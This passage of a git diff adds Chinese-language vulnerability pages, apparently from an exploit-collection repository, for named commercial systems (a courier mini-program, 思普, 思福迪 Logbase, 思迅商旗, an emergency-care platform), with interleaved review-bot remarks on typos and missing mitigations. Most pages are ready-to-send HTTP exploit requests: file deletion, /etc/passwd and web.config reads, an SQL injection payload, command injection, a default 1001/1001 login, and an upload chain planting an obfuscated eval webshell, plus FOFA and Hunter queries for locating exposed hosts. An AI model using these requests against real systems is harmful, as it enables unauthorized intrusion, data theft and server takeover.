<!--type: 
string--> + <tem:SalaryCategory></tem:SalaryCategory> + <!--type: string--> + <tem:StaffBirthDay></tem:StaffBirthDay> + <!--type: string--> + <tem:staffId> + 1) + </tem:staffId> + <!--type: string--> + <tem:Department></tem:Department> + <!--type: string--> + <tem:SubOrg></tem:SubOrg> + <!--type: string--> + <tem:taxMonthly></tem:taxMonthly> + </tem:Calculate> + </soapenv:Body> +</soapenv:Envelope> +``` + +![1705249400842-6d4244a7-09d1-4ed5-bea6-da016500b707.png](./img/tdsklyiA1YTnWaRM/1705249400842-6d4244a7-09d1-4ed5-bea6-da016500b707-009540.png) + + + +> 更新: 2024-02-29 23:55:42 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yogdi0xnw4pvfsfa> \ No newline at end of file diff --git a/快递微信小程序系统存在前台任意文件删除漏洞.md b/快递微信小程序系统存在前台任意文件删除漏洞.md new file mode 100644 index 0000000..ca07887 --- /dev/null +++ b/快递微信小程序系统存在前台任意文件删除漏洞.md 
@@ -0,0 +1,36 @@ +# 快递微信小程序系统controller任意文件删除漏洞 + +快递微信小程序系统 controller 接口存在任意文件删除漏洞,未经身份验证攻击者可通过该漏洞删除系统文件。 + +## fofa + +```javascript +body="/static/default/newwap/lang/js/jquery.localize.min.js" +``` + +## poc + +```javascript +POST /public/qiniu_ueditor/php/controller.php?action=remove HTTP/2 +Host: +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: max-age=0 +Content-Length: 14 +Content-Type: application/x-www-form-urlencoded +Cookie: think_var=zh-cn; PHPSESSID=5cg6kramfusrb94homfj2q7ku1; thinkphp_show_page_trace=0|0; admin=think%3A%7B%22admin_id%22%3A%221%22%2C%22type%22%3A%221%22%2C%22user_id%22%3A%221%22%2C%22username%22%3A%22admin%22%2C%22password%22%3A%2221232f297a57a5a743894a0e4a801fc3%22%2C%22role_id%22%3A%221%22%2C%22city_id%22%3A0%2C%22area_id%22%3A0%2C%22business_id%22%3A0%2C%22mobile%22%3A%2218888888888%22%2C%22lock_admin_mum%22%3A0%2C%22is_lock%22%3A%221%22%2C%22is_admin_lock%22%3A0%2C%22is_admin_lock_time%22%3A0%2C%22create_time%22%3A%221497679379%22%2C%22create_ip%22%3A%2227.13.26.84%22%2C%22last_time%22%3A%221603174799%22%2C%22last_ip%22%3A%2249.118.246.1%22%2C%22is_ip%22%3A0%2C%22is_username_lock%22%3A0%2C%22closed%22%3A0%2C%22role_name%22%3A%22%25E5%2585%25AC%25E5%258F%25B8%25E6%2580%25BB%25E9%2583%25A8%22%7D +Origin: http://127.0.0.1 +Referer: http://127.0.0.1/public/qiniu_ueditor/php/controller.php?action=remove +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Sec-Ch-Ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Sec-Fetch-User: ?1 + +key=./test.png +``` 
diff --git a/快递微信小程序系统存在前台任意文件读取漏洞.md b/快递微信小程序系统存在前台任意文件读取漏洞.md new file mode 100644 index 0000000..4c565b2 --- /dev/null +++ b/快递微信小程序系统存在前台任意文件读取漏洞.md @@ -0,0 +1,41 @@ +# 快递微信小程序系统存在前台任意文件读取漏洞 + +# 一、漏洞简介 +<font style="color:rgba(0, 0, 0, 0.84);">快递 微信小程序只系统是基于微信平台开发的轻量级应用,用户无需下载额外的APP,即可在微信内直接使用小程序进行快递操作。该系统集成了多项功能,实现了从寄件下单、物流跟踪到支付结算等全链条的快递服务,极大地提高了用户的便捷性和使用体验。、快递微信小程序系统 htpRequest 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件件、系统配置文件))、数据库配置文件等等,导致网站处于极度不安全状态。</font> + +# <font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font> ++ 快递微信小程序系统 + +# 三、资产测绘 +```plain +body="static/default/newwap/lang/js/jquery.localize.min.js" +``` + +![1730457310265-b879e78b-33fb-46fb-bd72-615836037832.png](./img/vmzVTMljI6tdu2He/1730457310265-b879e78b-33fb-46fb-bd72-615836037832-114887.png) + +# 四、漏洞复现 +```plain +GET /weixin/index/httpRequest?url=file:///etc/passwd HTTP/2 +Host: +Cookie: think_var=zh-cn; PHPSESSID=6igfjn7ik5nrk3bjc0i25ek357 +Cache-Control: max-age=0 +Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="101" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +``` + +![1730457254704-754bdc13-ed5a-4445-b048-7cb49eed50de.png](./img/vmzVTMljI6tdu2He/1730457254704-754bdc13-ed5a-4445-b048-7cb49eed50de-338272.png) + + + +> 更新: 2024-11-27 10:00:37 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/io075rmp08qw1kf6> \ No newline at end of file diff --git a/思普企业运营管理平台apilogin存在SQL注入漏洞.md b/思普企业运营管理平台apilogin存在SQL注入漏洞.md new file mode 100644 index 0000000..ae53340 --- /dev/null +++ b/思普企业运营管理平台apilogin存在SQL注入漏洞.md 
@@ -0,0 +1,26 @@ +# 思普企业运营管理平台apilogin存在SQL注入漏洞 + +思普企业运营管理平台是一款专为企业提供全方位运营管理解决方案的软件平台,旨在帮助企业实现运营流程的可视化、自动化和协同化管理,提升运营效率和管理水平。平台集成了多个功能模块,包括人力资源管理、财务管理、供应链管理、销售管理、项目管理等,通过集成各个部门功能模块,形成企业运营管理的全面解决方案。企业可以根据实际需求选择安装相应的模块,实现企业内部各个环节的协同管理。 + +## fofa + +```javascript +icon_hash="-403479360" +``` + +## poc + +```javascript +POST /IdsCenter/idsCheck?p=apilogin HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +X-Requested-With: XMLHttpRequest + +seqid=1%27+AND+6884+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%286884%3D6884%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29--+cxaC&datasource=EOMP1 +``` + +![image-20241128094626617](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280946689.png) \ No newline at end of file diff --git a/思福迪运维安全管理系统GetCaCert存在任意文件读取漏洞.md b/思福迪运维安全管理系统GetCaCert存在任意文件读取漏洞.md new file mode 100644 index 0000000..ad0b5c7 --- /dev/null +++ b/思福迪运维安全管理系统GetCaCert存在任意文件读取漏洞.md 
@@ -0,0 +1,33 @@ +# 思福迪运维安全管理系统 GetCaCert存在任意文件读取漏洞 + +# 一、漏洞简介 +<font style="color:rgb(0, 0, 0);">为满足用户对加强内部运维安全审计日益迫切的需要,杭州思福迪信息技术有限公司依托自身强大的研发能力,丰富的行业经验,自主研发了新一代软硬件一体化运维安全专用审计系统——Logbase运维安全管理系统。该系统支持对企业内部人员的维护行为进行全面的管理、审计,消除了传统审计系统中的盲点,使企业对运维人员的操作过程,能做到事前防范、事中控制、事后审计的能力,是企业IT内控最有效的运维管理平台。思福迪运维安全管理系统 GetCaCert存在任意文件读取漏洞。</font> + +# <font style="color:rgb(0, 0, 0);">二、影响版本</font> ++ 思福迪运维安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="Logbase 思福迪 运维安全系统"` ++ 特征 + +![1705244115545-ef7957e0-49a0-446a-af00-94cbec4e0d11.png](./img/q1E9jTVPnh7ZkQF_/1705244115545-ef7957e0-49a0-446a-af00-94cbec4e0d11-586111.png) + +# 四、漏洞复现 +```plain +GET /bhost/GetCaCert?a1=../../../../../etc/hosts HTTP/1.1 +Host: +Connection: close +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept: gzip +Accept-Encoding: gzip, deflate, br +Content-Length: 0 +``` + +![1705244843495-07e1b54b-81e9-4119-8b8f-0af9b5fdba17.png](./img/q1E9jTVPnh7ZkQF_/1705244843495-07e1b54b-81e9-4119-8b8f-0af9b5fdba17-171121.png) + +![1705244860034-ecd21dc6-093f-4b2e-b277-97580ea1b8db.png](./img/q1E9jTVPnh7ZkQF_/1705244860034-ecd21dc6-093f-4b2e-b277-97580ea1b8db-040679.png) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wuf31x217y4a3dvr> \ No newline at end of file diff --git a/思福迪运维安全管理系统test_qrcode_b存在远程命令执行漏洞.md b/思福迪运维安全管理系统test_qrcode_b存在远程命令执行漏洞.md new file mode 100644 index 0000000..9d440bd --- /dev/null +++ b/思福迪运维安全管理系统test_qrcode_b存在远程命令执行漏洞.md 
@@ -0,0 +1,36 @@ +# 思福迪运维安全管理系统 test_qrcode_b存在远程命令执行漏洞 + +# 一、漏洞简介 +<font style="color:rgb(0, 0, 0);">为满足用户对加强内部运维安全审计日益迫切的需要,杭州思福迪信息技术有限公司依托自身强大的研发能力,丰富的行业经验,自主研发了新一代软硬件一体化运维安全专用审计系统——Logbase运维安全管理系统。该系统支持对企业内部人员的维护行为进行全面的管理、审计,消除了传统审计系统中的盲点,使企业对运维人员的操作过程,能做到事前防范、事中控制、事后审计的能力,是企业IT内控最有效的运维管理平台。思福迪运维安全管理系统 test_qrcode_b存在远程命令执行漏洞,未经身份认证得攻击者可以通过此漏洞执行任意指令,造成服务器失陷。</font> + +# <font style="color:rgb(0, 0, 0);">二、影响版本</font> ++ 思福迪运维安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="Logbase 思福迪 运维安全系统"` ++ 特征 + +![1705244115545-ef7957e0-49a0-446a-af00-94cbec4e0d11.png](./img/ADIpIBPu5hmcUuwL/1705244115545-ef7957e0-49a0-446a-af00-94cbec4e0d11-969584.png) + +# 四、漏洞复现 +`referer`头不能删除 + +```plain +POST /bhost/test_qrcode_b HTTP/1.1 +Host: +User-Agent: Go-http-client/1.1 +Content-Length: 23 +Accept-Encoding: gzip, deflate +Connection: close +Content-Type: application/x-www-form-urlencoded +Referer: + +z1=1&z2="|id;"&z3=bhost +``` + +![]() + + + +> 更新: 2024-02-29 23:57:11 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cwhyqkk2t3hh660w> \ No newline at end of file diff --git a/思迅商旗商业管理系统10SetAiPosItemImage存在任意文件上传漏洞.md b/思迅商旗商业管理系统10SetAiPosItemImage存在任意文件上传漏洞.md new file mode 100644 index 0000000..a0fdd3d --- /dev/null +++ b/思迅商旗商业管理系统10SetAiPosItemImage存在任意文件上传漏洞.md 
@@ -0,0 +1,91 @@ +# 思迅商旗商业管理系统10 SetAiPosItemImage存在任意文件上传漏洞 + +# 一、漏洞简介 +思迅商旗商业管理系统是基于互联网部署的全新零售管理系统。提炼各架构优势之大成,打造全新互联网产品。思思迅商旗商业管理系统7 SetAiPosItemImage存在任意文件上传漏洞。 + +# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font> ++ 思迅商旗商业管理系统10 + +# 三、资产测绘 ++ hunter`app.name=="思迅商旗"` ++ 特征![1705135226264-0d5d4bd8-f3f8-4e10-a2da-14519b7ffa05.png](./img/EYVidbNdF5vXvYpz/1705135226264-0d5d4bd8-f3f8-4e10-a2da-14519b7ffa05-398111.png) + +# 四、漏洞复现 +```plain +POST /api/POS/SetAiPosItemImage HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36 +Content-Length: 416 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/json +Upgrade-Insecure-Requests: 1 +x-forwarded-for: 127.0.0.1 + +{"Body":{"pos_id":"test","file_data":"UEsDBBQAAAAIAJmoeFdm5m19YgAAAGQAAAATAAAAaW5pdC1jNTIyMjg1MzVhLmNzcwXBQQqEMAwAwLvgH3rcPXRJaV3Qk19JkxQLGsUqKuLfnekn4Yym0CqiBpXNZ8LTHpm3oXM+wHJ+77r6qRzF0rzrZpOTBjhBixJT5Cb9OXhHPgZwBBRvzmUZ8ep0Vnnq6nkBUEsBAj8AFAAAAAgAmah4V2bmbX1iAAAAZAAAABMAJAAAAAAAAAAgAAAAAAAAAGluaXQtYzUyMjI4NTM1YS5jc3MKACAAAAAAAAEAGADoFpjO1h7aAQAAAAAAAAAAAAAAAAAAAABQSwUGAAAAAAEAAQBlAAAAkwAAAAAA","last_time":""}} +``` + +![1705135268669-5e7dd30a-96c0-45eb-9c07-43b82a233582.png](./img/EYVidbNdF5vXvYpz/1705135268669-5e7dd30a-96c0-45eb-9c07-43b82a233582-331085.png) + +上传文件位置 + +```plain +/AiItemImage/init-c52228535a.css +``` + +![1705135301442-a37e9e9c-c521-4b9b-b377-5d5f98f30f34.png](./img/EYVidbNdF5vXvYpz/1705135301442-a37e9e9c-c521-4b9b-b377-5d5f98f30f34-187161.png) + +漏洞利用 + +准备webshell`stc.aspx` + +```plain +<% function E873yr9k(){var GEPH="unsa",YACK="fe",C910=GEPH+YACK;return C910;}var PAY:String=Request["x"];~eval/*Zf10I0IzZH*/(PAY,E873yr9k());%><%@Page Language=JS%> +``` + +压缩webshell + 
+[stc.zip](https://www.yuque.com/attachments/yuque/0/2024/zip/1622799/1709222142219-d3f253b2-3b28-4613-acfc-43fc8ef73eba.zip) + +将压缩文件转换为base64编码 + +[Mosaic-crypt-tools-1.5-SNAPSHOT-jar-with-dependencies.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222142539-f522d0ae-c3bc-443d-95b0-e63662e6b81b.jar) + +![1705135429824-9f80641f-7249-46cd-b415-a3874272492c.png](./img/EYVidbNdF5vXvYpz/1705135429824-9f80641f-7249-46cd-b415-a3874272492c-032939.png) + +上传webshell + +```plain +POST /api/POS/SetAiPosItemImage HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36 +Content-Length: 444 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/json +Upgrade-Insecure-Requests: 1 +x-forwarded-for: 127.0.0.1 + +{"Body":{"pos_id":"test","file_data":"UEsDBBQAAAgIABeAKli/64yUkwAAAKQAAAAIABAAc3RjLmFzcHhVWAwAEkeiZa5OnmX1ARQAs1FVSCvNSy7JzM9TcLUwN64ssszW0KwuSyxScHcN8LBVKs0rTlTSiXR09rZVSktV0nG2NDSwBUlpg8Ssi1JLSovyFECi1rUgXQGOkVbBJUWZeem2QamFpanFJdFKFUqx1nWpZYk5+lpRaYYGngaeVVEeWvoaQLU6CEs1rVXtbFQdAhLTUxV8EvPSS4EMW69gVTsAUEsBAhQDFAAACAgAF4AqWL/rjJSTAAAApAAAAAgADAAAAAAAAAAgAKSBAAAAAHN0Yy5hc3B4VVgIABJHomWuTp5lUEsFBgAAAAABAAEAQgAAAMkAAAAAAA==","last_time":""}} +``` + +![1705135455265-09705950-bc64-49f0-a43c-9771ade4110f.png](./img/EYVidbNdF5vXvYpz/1705135455265-09705950-bc64-49f0-a43c-9771ade4110f-087471.png) + +上传文件位置 + +```plain +/AiItemImage/stc.aspx +``` + +![1705135492983-2de64683-d6e8-42cb-b251-38c7c38eed5b.png](./img/EYVidbNdF5vXvYpz/1705135492983-2de64683-d6e8-42cb-b251-38c7c38eed5b-212372.png) + +[思迅商旗-setaipositemimage-任意文件上传.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222142739-e95ae867-5ce0-482d-8b4e-707627bcdbe4.yaml) + + + +> 更新: 2024-02-29 
23:55:42 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fbpfgs6seeig8wdu> \ No newline at end of file diff --git a/思迅商旗商业管理系统7Cashier存在信息泄露漏洞.md b/思迅商旗商业管理系统7Cashier存在信息泄露漏洞.md new file mode 100644 index 0000000..3314def --- /dev/null +++ b/思迅商旗商业管理系统7Cashier存在信息泄露漏洞.md @@ -0,0 +1,37 @@ +# 思迅商旗商业管理系统7 Cashier存在信息泄露漏洞 + +# 一、漏洞简介 +思迅商旗商业管理系统是基于互联网部署的全新零售管理系统。提炼各架构优势之大成,打造全新互联网产品。思迅商旗商业管理系统Cashier存在信息泄露漏洞。 + +# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font> ++ 思迅商旗商业管理系统7 + +# 三、资产测绘 ++ hunter`app.name=="思迅商旗"` ++ 特征 + +![1705060048606-5d05fc49-9ceb-4db7-84e0-7304c7456bf4.png](./img/50UcaSwGuz9_KosN/1705060048606-5d05fc49-9ceb-4db7-84e0-7304c7456bf4-954273.png) + +# 四、漏洞复现 +```java +POST /api/Cashier/LoadData HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Length: 68 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 +Cache-Control: no-cache +Connection: close +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest + +loadAll=false&cashier_id=&gridFlag=CashierList&page=1&rows=60 +``` + +![1705060351817-349ac876-e506-4b44-b896-a17b0dcefa03.png](./img/50UcaSwGuz9_KosN/1705060351817-349ac876-e506-4b44-b896-a17b0dcefa03-502881.png) + + + +> 更新: 2024-02-29 23:55:42 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fgmcmt41ci8fdtuz> \ No newline at end of file diff --git a/思迅商旗商业管理系统7GylOperator存在信息泄露漏洞.md b/思迅商旗商业管理系统7GylOperator存在信息泄露漏洞.md new file mode 100644 index 0000000..0213259 --- /dev/null +++ b/思迅商旗商业管理系统7GylOperator存在信息泄露漏洞.md 
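Review bot: The 漏洞简介 of 思迅商旗商业管理系统10 SetAiPosItemImage存在任意文件上传漏洞.md contradicts the title and 影响版本: it reads "思思迅商旗商业管理系统7" (doubled 思, version 7) while the heading and version list say 10; fix the typo and settle on one version. The page also never states what the server does with `file_data`, although the two 上传文件位置 lines (`/AiItemImage/init-c52228535a.css`, `/AiItemImage/stc.aspx`) show that the zip entry name is written under the web root unchanged, which is the defect a fix must address (allow-list entry extensions, ignore the archive's own names, keep the directory non-executable); say so and add the vendor fix or mitigation, and note for defenders that a POST to `/api/POS/SetAiPosItemImage` whose decoded `file_data` archive carries a non-image entry is the log signature. Minor: the 二、影响版本 heading carries an inline `<font>` tag that does not belong in a markdown heading, and `Host:` is empty in both requests.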
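Review bot: `Content-Length: 68` in 思迅商旗商业管理系统7Cashier存在信息泄露漏洞.md does not match the body shown (`loadAll=false&cashier_id=&gridFlag=CashierList&page=1&rows=60` is 61 bytes; the 68 is the header of the GylOperator request copied over), and the request is fenced as ```java although it is HTTP; use ```http as the other pages in this commit do. The text also never says what the unauthenticated `/api/Cashier/LoadData` response discloses, so the 信息泄露 claim rests on the screenshot alone; list the returned fields and add the mitigation (require a session on the LoadData endpoints).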
@@ -0,0 +1,43 @@ +# 思迅商旗商业管理系统7 GylOperator存在信息泄露漏洞 + +# 一、漏洞简介 +思迅商旗商业管理系统是基于互联网部署的全新零售管理系统。提炼各架构优势之大成,打造全新互联网产品。思迅商旗商业管理系统GylOperator存在信息泄露漏洞,<font style="color:rgba(0, 0, 0, 0.9);">攻击者可通过该漏洞在服务器端读取账户密码,从而登录后台。</font> + +# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font> ++ 思迅商旗商业管理系统7 + +# 三、资产测绘 ++ hunter`app.name=="思迅商旗"` ++ 特征 + +![1705060048606-5d05fc49-9ceb-4db7-84e0-7304c7456bf4.png](./img/2A930e-fCUruS1PS/1705060048606-5d05fc49-9ceb-4db7-84e0-7304c7456bf4-600717.png) + +# 四、漏洞复现 +```java +POST /api/GylOperator/LoadData HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Length: 68 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 +Cache-Control: no-cache +Connection: close +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest + +loadAll=false&key=&oper_role=&gridFlag=GylOperatorList&page=1&rows=1 +``` + +![1705060098747-c6665464-15ab-4c81-820d-1451d49f124f.png](./img/2A930e-fCUruS1PS/1705060098747-c6665464-15ab-4c81-820d-1451d49f124f-449203.png) + +解密 + +![1705060110267-c8a83e28-b7a6-405a-a6ec-9d97db539e71.png](./img/2A930e-fCUruS1PS/1705060110267-c8a83e28-b7a6-405a-a6ec-9d97db539e71-014155.png) + +![1705060626680-642f8fe6-d094-4c99-af4a-978993b73ddb.png](./img/2A930e-fCUruS1PS/1705060626680-642f8fe6-d094-4c99-af4a-978993b73ddb-306254.png) + + + +> 更新: 2024-02-29 23:55:42 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vzyrz9h4ztl1gdca> \ No newline at end of file diff --git a/思迅商旗商业管理系统7Operator存在信息泄露漏洞.md b/思迅商旗商业管理系统7Operator存在信息泄露漏洞.md new file mode 100644 index 0000000..1e757ab --- /dev/null +++ b/思迅商旗商业管理系统7Operator存在信息泄露漏洞.md 
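Review bot: The 漏洞简介 of 思迅商旗商业管理系统7GylOperator存在信息泄露漏洞.md claims the leaked account passwords can be read and used to log in, but the 解密 step is only two screenshots; document what the password field in the `/api/GylOperator/LoadData` response actually is (a hash or a reversible encoding) and how it was decoded, otherwise the claim cannot be checked from the text, and the fix differs (never return the credential field at all vs. hashing it properly). Minor: the request is fenced as ```java; ```http is the right tag.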
@@ -0,0 +1,37 @@ +# 思迅商旗商业管理系统7 Operator存在信息泄露漏洞 + +# 一、漏洞简介 +思迅商旗商业管理系统是基于互联网部署的全新零售管理系统。提炼各架构优势之大成,打造全新互联网产品。思迅商旗商业管理系统Operator存在信息泄露漏洞。 + +# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font> ++ 思迅商旗商业管理系统7 + +# 三、资产测绘 ++ hunter`app.name=="思迅商旗"` ++ 特征 + +![1705060048606-5d05fc49-9ceb-4db7-84e0-7304c7456bf4.png](./img/4u1P83hisIgQdJ6S/1705060048606-5d05fc49-9ceb-4db7-84e0-7304c7456bf4-962899.png) + +# 四、漏洞复现 +```java +POST /api/Operator/LoadData HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Length: 68 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 +Cache-Control: no-cache +Connection: close +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest + +loadAll=false&oper_role=&field=&operator=&value=1001&gridFlag=OperatorList&page=1&rows=10 +``` + +![1705060505001-32bb86d5-04df-4001-888a-4880bd5e7c92.png](./img/4u1P83hisIgQdJ6S/1705060505001-32bb86d5-04df-4001-888a-4880bd5e7c92-968676.png) + + + +> 更新: 2024-02-29 23:55:42 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/afl5poxqgwpz8yhp> \ No newline at end of file diff --git a/思迅商旗商业管理系统7存在弱口令漏洞.md b/思迅商旗商业管理系统7存在弱口令漏洞.md new file mode 100644 index 0000000..bc72fea --- /dev/null +++ b/思迅商旗商业管理系统7存在弱口令漏洞.md 
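Review bot: `Content-Length: 68` in 思迅商旗商业管理系统7Operator存在信息泄露漏洞.md is wrong for the body shown (`loadAll=false&oper_role=&field=&operator=&value=1001&gridFlag=OperatorList&page=1&rows=10` is 89 bytes); it is the same header pasted across the Cashier/GylOperator/Operator/Login pages. `value=1001` is also the operator id used as the default credential on the weak-password page, which is worth stating since it ties the two findings together. Fence tag should be ```http, not ```java.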
@@ -0,0 +1,43 @@ +# 思迅商旗商业管理系统7 存在弱口令漏洞 + +# 一、漏洞简介 +思迅商旗商业管理系统是基于互联网部署的全新零售管理系统。提炼各架构优势之大成,打造全新互联网产品。思迅商旗商业管理系统7 存在弱口令漏洞。 + +# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font> ++ 思迅商旗商业管理系统7 + +# 三、资产测绘 ++ hunter`app.name=="思迅商旗"` ++ 特征 + +![1705060048606-5d05fc49-9ceb-4db7-84e0-7304c7456bf4.png](./img/4pn1CRecNauCHbAK/1705060048606-5d05fc49-9ceb-4db7-84e0-7304c7456bf4-659934.png) + +# 四、漏洞复现 +```java +1001/1001 +``` + +```java +POST /api/Login/Login HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Length: 68 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 +Cache-Control: no-cache +Connection: close +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest + +id=1001&password=1001&onlineQuery=true +``` + +![1705060724236-2371caa6-c4c6-4269-9a01-00f464020b31.png](./img/4pn1CRecNauCHbAK/1705060724236-2371caa6-c4c6-4269-9a01-00f464020b31-293689.png) + +![1705060732228-0093a93b-e495-499e-ae31-e917007f0742.png](./img/4pn1CRecNauCHbAK/1705060732228-0093a93b-e495-499e-ae31-e917007f0742-006952.png) + + + +> 更新: 2024-02-29 23:55:42 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xmf6cin0839sge0f> \ No newline at end of file diff --git a/急诊综合管理平台ServicePage.aspx任意文件读取漏洞.md b/急诊综合管理平台ServicePage.aspx任意文件读取漏洞.md new file mode 100644 index 0000000..f415082 --- /dev/null +++ b/急诊综合管理平台ServicePage.aspx任意文件读取漏洞.md 
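Review bot: In 思迅商旗商业管理系统7存在弱口令漏洞.md the credential `1001/1001` sits in a ```java fence and the login request again carries `Content-Length: 68` for a 38-byte body (`id=1001&password=1001&onlineQuery=true`); fix both. More importantly the page does not say whether `1001` is a vendor-shipped default or merely a common operator id, nor what privilege that account has; add that, plus the mitigation (force a password change on first login and lock out after repeated `/api/Login/Login` failures).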
@@ -0,0 +1,23 @@ +# 急诊综合管理平台ServicePage.aspx任意文件读取漏洞 + +急诊综合管理平台 ServicePage.aspx 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件。 + +## fofa + +```javascript +body="/emis_lib/js/ThreeExtras.js" +``` + +## poc + +```javascript +GET /dcwriter/thirdpart/ServicePage.aspx?wasmres=./../web.config HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +``` + +![image-20250103100646017](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501031006091.png) \ No newline at end of file diff --git a/悟空CRM9.0存在fastjson远程代码执行漏洞(CVE-2024-23052).md b/悟空CRM9.0存在fastjson远程代码执行漏洞(CVE-2024-23052).md new file mode 100644 index 0000000..9928f7b --- /dev/null +++ b/悟空CRM9.0存在fastjson远程代码执行漏洞(CVE-2024-23052).md @@ -0,0 